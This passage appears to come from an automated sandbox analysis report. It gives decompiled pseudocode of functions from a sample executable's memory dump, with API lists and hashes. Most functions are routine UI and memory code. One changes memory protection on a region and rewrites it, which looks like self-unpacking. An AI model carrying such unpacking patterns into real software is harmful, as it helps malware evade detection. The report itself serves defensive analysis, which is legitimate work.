				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x496c04 != 0) {
					_t54 =  *0x496c04; // 0x2170d40
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x454899);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x496c04 != 0) {
					_t52 =  *0x496c04; // 0x2170d40
					E00456B68(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041F620( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041F620( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0xac000000
					E0041F704( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041F620( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0xac000000
					E0041F620( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041F620( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0xac000000
				E0041F464( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041F464( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x4548a0);
				if( *0x496c04 != 0) {
					_t38 =  *0x496c04; // 0x2170d40
					return E00456B68(_t38, _v5);
				}
				return 0;
			}






















                                                                        0x00454754
                                                                        0x00454755
                                                                        0x00454757
                                                                        0x0045475e
                                                                        0x00454760
                                                                        0x0045476b
                                                                        0x0045476d
                                                                        0x00454778
                                                                        0x00454778
                                                                        0x0045477d
                                                                        0x0045477e
                                                                        0x00454783
                                                                        0x00454786
                                                                        0x00454790
                                                                        0x00454794
                                                                        0x00454799
                                                                        0x00454799
                                                                        0x004547af
                                                                        0x004547cb
                                                                        0x004547d2
                                                                        0x004547d8
                                                                        0x004547b1
                                                                        0x004547b5
                                                                        0x004547bc
                                                                        0x004547c2
                                                                        0x004547c2
                                                                        0x004547dd
                                                                        0x004547f4
                                                                        0x004547fb
                                                                        0x00454831
                                                                        0x0045483c
                                                                        0x00454843
                                                                        0x0045484a
                                                                        0x00454850
                                                                        0x004547fd
                                                                        0x00454804
                                                                        0x0045480b
                                                                        0x00454811
                                                                        0x0045481d
                                                                        0x00454824
                                                                        0x0045482a
                                                                        0x0045482a
                                                                        0x00454855
                                                                        0x00454860
                                                                        0x00454865
                                                                        0x00454870
                                                                        0x0045487a
                                                                        0x0045487d
                                                                        0x00454889
                                                                        0x0045488e
                                                                        0x00000000
                                                                        0x00454893
                                                                        0x00454898

                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004547A8
                                                                        • CreateFontIndirectA.GDI32(?), ref: 004547B5
                                                                        • GetStockObject.GDI32(0000000D), ref: 004547CB
                                                                          • Part of subcall function 0041F704: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F711
                                                                        • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004547F4
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00454804
                                                                        • CreateFontIndirectA.GDI32(?), ref: 0045481D
                                                                        • GetStockObject.GDI32(0000000D), ref: 00454843
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                        • String ID:
                                                                        • API String ID: 2891467149-0
                                                                        • Opcode ID: 6f8d4d31483a260ff14e10f917ad7f427b490c81166326aeb79ff36f3aed0e0f
                                                                        • Instruction ID: 54e94ae64045f866c9d0fd814db0631e9b26727ee0c17caded26134f85bec22f
                                                                        • Opcode Fuzzy Hash: 6f8d4d31483a260ff14e10f917ad7f427b490c81166326aeb79ff36f3aed0e0f
                                                                        • Instruction Fuzzy Hash: A7316A30604244ABDB50FBA5DC42B9633E5AB44308F5580B7BD4CDF2A7DE78994EC729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00453F78, Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E00453F78(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				char _t67;
				void* _t77;
				struct HDC__* _t78;
				void* _t79;
				void* _t80;

				_t77 = __edi;
				_t67 = __edx;
				if(__edx != 0) {
					_t80 = _t80 + 0xfffffff0;
					_t25 = E00403940(_t25, _t79);
				}
				_v5 = _t67;
				_t65 = _t25;
				E0041C1DC(_t66, 0);
				_t28 =  *0x49591c; // 0x47a458
				 *((intOrPtr*)(_t28 + 4)) = _t65;
				 *_t28 = 0x45431c;
				_t29 =  *0x495928; // 0x47a460
				 *((intOrPtr*)(_t29 + 4)) = _t65;
				 *_t29 = 0x454328;
				E00454334(_t65);
				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t65 + 0x4c)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x50)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x54)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x58)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x7c)) = E004035AC(1);
				_t78 = GetDC(0);
				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
				ReleaseDC(0, _t78);
				_t11 = _t65 + 0x58; // 0x44d3f86e
				_t48 =  *0x495a58; // 0x496ab8
				 *((intOrPtr*)( *_t48))(0, 0, E004507FC,  *_t11);
				 *((intOrPtr*)(_t65 + 0x84)) = E0041F290(1);
				 *((intOrPtr*)(_t65 + 0x88)) = E0041F290(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E0041F290(1);
				E00454754(_t65, _t65, _t66, _t77);
				_t15 = _t65 + 0x84; // 0x38004010
				_t59 =  *_t15;
				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
				 *((intOrPtr*)(_t59 + 8)) = 0x454630;
				_t18 = _t65 + 0x88; // 0x90000000
				_t60 =  *_t18;
				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
				 *((intOrPtr*)(_t60 + 8)) = 0x454630;
				_t21 = _t65 + 0x80; // 0xac000000
				_t61 =  *_t21;
				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
				 *((intOrPtr*)(_t61 + 8)) = 0x454630;
				_t62 = _t65;
				if(_v5 != 0) {
					E00403998(_t62);
					_pop( *[fs:0x0]);
				}
				return _t65;
			}






















                                                                        0x00453f78
                                                                        0x00453f78
                                                                        0x00453f80
                                                                        0x00453f82
                                                                        0x00453f85
                                                                        0x00453f85
                                                                        0x00453f8a
                                                                        0x00453f8d
                                                                        0x00453f93
                                                                        0x00453f98
                                                                        0x00453f9d
                                                                        0x00453fa0
                                                                        0x00453fa6
                                                                        0x00453fab
                                                                        0x00453fae
                                                                        0x00453fb6
                                                                        0x00453fc2
                                                                        0x00453fd1
                                                                        0x00453fe0
                                                                        0x00453fef
                                                                        0x00453ffe
                                                                        0x0045400d
                                                                        0x00454017
                                                                        0x00454021
                                                                        0x00454027
                                                                        0x0045402c
                                                                        0x0045403a
                                                                        0x00454041
                                                                        0x0045404f
                                                                        0x00454061
                                                                        0x00454073
                                                                        0x0045407b
                                                                        0x00454080
                                                                        0x00454080
                                                                        0x00454086
                                                                        0x00454089
                                                                        0x00454090
                                                                        0x00454090
                                                                        0x00454096
                                                                        0x00454099
                                                                        0x004540a0
                                                                        0x004540a0
                                                                        0x004540a6
                                                                        0x004540a9
                                                                        0x004540b0
                                                                        0x004540b6
                                                                        0x004540b8
                                                                        0x004540bd
                                                                        0x004540c4
                                                                        0x004540cd

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CapsDeviceKeyboardLayoutRelease
                                                                        • String ID:
                                                                        • API String ID: 3331096196-0
                                                                        • Opcode ID: 7cd0441e299d4dd76d954c66a31d9b821428746ca5e7d7290b214efdd2fa17c6
                                                                        • Instruction ID: b3b2c94ae3b9948f2a134b370cea85584a5ef29b9b8697dbbfd7147a4e89023a
                                                                        • Opcode Fuzzy Hash: 7cd0441e299d4dd76d954c66a31d9b821428746ca5e7d7290b214efdd2fa17c6
                                                                        • Instruction Fuzzy Hash: 873109B06112409FD740EF2ADCC1B857BE4AB05319F0490BAED08CF3A7DB7A9849DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040218C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401AA0: RtlInitializeCriticalSection.KERNEL32(004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
                                                                          • Part of subcall function 00401AA0: RtlEnterCriticalSection.KERNEL32(004965C4,004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
                                                                          • Part of subcall function 00401AA0: LocalAlloc.KERNEL32(00000000,00000FF8,004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
                                                                          • Part of subcall function 00401AA0: RtlLeaveCriticalSection.KERNEL32(004965C4,00401B5D,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,00000000,00402308), ref: 004021D7
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,0040230F), ref: 00402302
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                        • String ID: X"~
                                                                        • API String ID: 2227675388-2380381185
                                                                        • Opcode ID: 35d58ee3540cf062b3df7ea74c26ca495e5eebe2a6b1ad0ad556c1b196560d5d
                                                                        • Instruction ID: 83bdff73d5a1a07a892888f5c36523991864ad6eb74594df81dd07f85809d88a
                                                                        • Opcode Fuzzy Hash: 35d58ee3540cf062b3df7ea74c26ca495e5eebe2a6b1ad0ad556c1b196560d5d
                                                                        • Instruction Fuzzy Hash: B941EEB2A006009FD714CF69EE85629B7A4EB65328B27427FD801E77E1E67C9C418B1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00427300, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00427300(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x496ac4 == 0) {
					 *0x496a9c = E00427218(0, _t8,  *0x496a9c, _t17, _t18);
					_t7 =  *0x496a9c(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                                        0x00427304
                                                                        0x0042730e
                                                                        0x00427322
                                                                        0x00427328
                                                                        0x00000000
                                                                        0x00427328
                                                                        0x00427330
                                                                        0x00427338
                                                                        0x00427338
                                                                        0x0042733b
                                                                        0x0042734f
                                                                        0x0042733d
                                                                        0x0042733d
                                                                        0x00427353
                                                                        0x0042733f
                                                                        0x0042733f
                                                                        0x0042733f
                                                                        0x00427340
                                                                        0x00427357
                                                                        0x00427342
                                                                        0x00427343
                                                                        0x00427346
                                                                        0x00427348
                                                                        0x00427348
                                                                        0x00427346
                                                                        0x00427340
                                                                        0x0042733d
                                                                        0x0042735c
                                                                        0x0042735f
                                                                        0x00427369
                                                                        0x00427361
                                                                        0x00000000
                                                                        0x00427362

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 00427362
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        • KiUserCallbackDispatcher.NTDLL ref: 00427328
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                        • String ID: GetSystemMetrics
                                                                        • API String ID: 54681038-96882338
                                                                        • Opcode ID: 55446e7e76123103b454da646c455967d357e49010d04799ca10e5a3ca25f6d8
                                                                        • Instruction ID: 5b839be3fabe59c0cd91bf616db641c7d3104d278b4c8a76039aace42cce4069
                                                                        • Opcode Fuzzy Hash: 55446e7e76123103b454da646c455967d357e49010d04799ca10e5a3ca25f6d8
                                                                        • Instruction Fuzzy Hash: CBF0623171C6124AC610CA74BC855263546A75A374FE88733ED16966E1C23D9845E25D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040174C, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040174C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4965e4; // 0x7e388c
				while(_t29 != 0x4965e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                        0x00401753
                                                                        0x00401757
                                                                        0x0040175e
                                                                        0x00401773
                                                                        0x0040177b
                                                                        0x00401781
                                                                        0x00401787
                                                                        0x0040178a
                                                                        0x004017ce
                                                                        0x00401792
                                                                        0x00401798
                                                                        0x0040179c
                                                                        0x0040179e
                                                                        0x0040179e
                                                                        0x004017a4
                                                                        0x004017a6
                                                                        0x004017a6
                                                                        0x004017ac
                                                                        0x004017b9
                                                                        0x004017c0
                                                                        0x004017c2
                                                                        0x004017c8
                                                                        0x00000000
                                                                        0x004017c8
                                                                        0x004017c0
                                                                        0x004017cc
                                                                        0x004017cc
                                                                        0x004017dd

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004017B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: |8~
                                                                        • API String ID: 4275171209-42510566
                                                                        • Opcode ID: c9ed9fcde6cb23d72c6a0544bc66612bea3eb4eb7cb598ee75956fec592b491e
                                                                        • Instruction ID: df40b9f29fcf593a2001ebb942b006e8579671ba7d571f2f05a33fea13171e4b
                                                                        • Opcode Fuzzy Hash: c9ed9fcde6cb23d72c6a0544bc66612bea3eb4eb7cb598ee75956fec592b491e
                                                                        • Instruction Fuzzy Hash: F1118E76A04705AFC3109F29C880A2BBBE1EFD4760F16C53EE598A73A5D735AC408789
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454334, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00454334(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x47ab90;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x496714; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E004543EC(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                                        0x00454338
                                                                        0x00454346
                                                                        0x00454349
                                                                        0x0045434e
                                                                        0x00454353
                                                                        0x00454356
                                                                        0x00454360
                                                                        0x0045436a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00454362
                                                                        0x00454362
                                                                        0x00454362
                                                                        0x00454362
                                                                        0x00454370
                                                                        0x0045437b
                                                                        0x00454380
                                                                        0x00454381
                                                                        0x00454384
                                                                        0x0045438d

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CursorLoad
                                                                        • String ID:
                                                                        • API String ID: 3238433803-0
                                                                        • Opcode ID: d761e11c61c979bdf821915641afd05efaccb41e9284a7765425020a359a9d55
                                                                        • Instruction ID: 45ff5c45349f62151306836f9853a517dcd13b5311b8dd786089dfbce635c089
                                                                        • Opcode Fuzzy Hash: d761e11c61c979bdf821915641afd05efaccb41e9284a7765425020a359a9d55
                                                                        • Instruction Fuzzy Hash: 51F0E911B00241479A50557D4CC096E3254DBC273DB210377FE79CE2F2C62D2C858159
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004015B8, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004015B8(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040146C(0x4965e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                        0x004015bb
                                                                        0x004015c5
                                                                        0x004015d4
                                                                        0x004015c7
                                                                        0x004015c7
                                                                        0x004015c7
                                                                        0x004015da
                                                                        0x004015e7
                                                                        0x004015ec
                                                                        0x004015ee
                                                                        0x004015f2
                                                                        0x004015fb
                                                                        0x00401602
                                                                        0x0040160e
                                                                        0x00401615
                                                                        0x00000000
                                                                        0x00401615
                                                                        0x00401602
                                                                        0x0040161a

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018C1), ref: 004015E7
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018C1), ref: 0040160E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Virtual$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2087232378-0
                                                                        • Opcode ID: 9e2649f51290d73c37372646d6b2be47bcd4918fbfb34046e085b880d4026c3a
                                                                        • Instruction ID: 904b9d4922f68113b59492f8b44d46dc7ec4cb2fb37737401e8004d19412cf8b
                                                                        • Opcode Fuzzy Hash: 9e2649f51290d73c37372646d6b2be47bcd4918fbfb34046e085b880d4026c3a
                                                                        • Instruction Fuzzy Hash: 88F0E272B003202BEB205A6A0CC1B536AC49B857A4F190477B948FF3E9D67A8C0082A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0047942C, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0047942C(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
				if(E0047940C( *((intOrPtr*)( *_t31))) == 0) {
					if(E00479418( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x479404;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa8) ^ 0x000ba895) != 0x9a1e0) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xa0), 0x1415a, 4,  &_v8); // executed
				E0047951C(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xa0)), 0x1415a, __edi, __esi, 0x1aa6f, 0x47ade0);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x62f5;
				return _t29 | 0xffffffff;
			}









                                                                        0x00479431
                                                                        0x0047943f
                                                                        0x004794b1
                                                                        0x00000000
                                                                        0x004794c6
                                                                        0x004794bb
                                                                        0x00000000
                                                                        0x004794c1
                                                                        0x00479441
                                                                        0x00479456
                                                                        0x00000000
                                                                        0x004794a2
                                                                        0x0047946c
                                                                        0x0047948b
                                                                        0x00479490
                                                                        0x00479493
                                                                        0x00000000

                                                                        APIs
                                                                        • VirtualProtectEx.KERNEL32(000000FF,?,0001415A,00000004,?), ref: 0047946C
                                                                          • Part of subcall function 0047951C: GetKeyboardType.USER32(00000000), ref: 0047958B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: KeyboardProtectTypeVirtual
                                                                        • String ID:
                                                                        • API String ID: 687961724-0
                                                                        • Opcode ID: a14af51c247e0b399cf11fe92d5a90e969ef7e6e005634e7367ce840528c0a59
                                                                        • Instruction ID: fc2a89276082dc8536020b565f8470d0cf6bf16a89c644c3f15dbdb255ca1576
                                                                        • Opcode Fuzzy Hash: a14af51c247e0b399cf11fe92d5a90e969ef7e6e005634e7367ce840528c0a59
                                                                        • Instruction Fuzzy Hash: 64113031248200AFCB50DB15C981EE573A5EB46364F64C7A6E92C5F396D634EC46CB2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00441B28, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E00441B28(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x441bae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x496b74 =  *0x496b74 - 1;
				if( *0x496b74 < 0) {
					 *0x496b70 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x496b70;
					E004418D8(_t16, __edi,  *0x496b70);
					_t6 =  *0x431d0c; // 0x431d58
					E00413838(_t6, _t16, _t17,  *0x496b70);
					_t8 =  *0x431d0c; // 0x431d58
					E004138D8(_t8, _t16, _t17, _t31);
					_t21 =  *0x431d0c; // 0x431d58
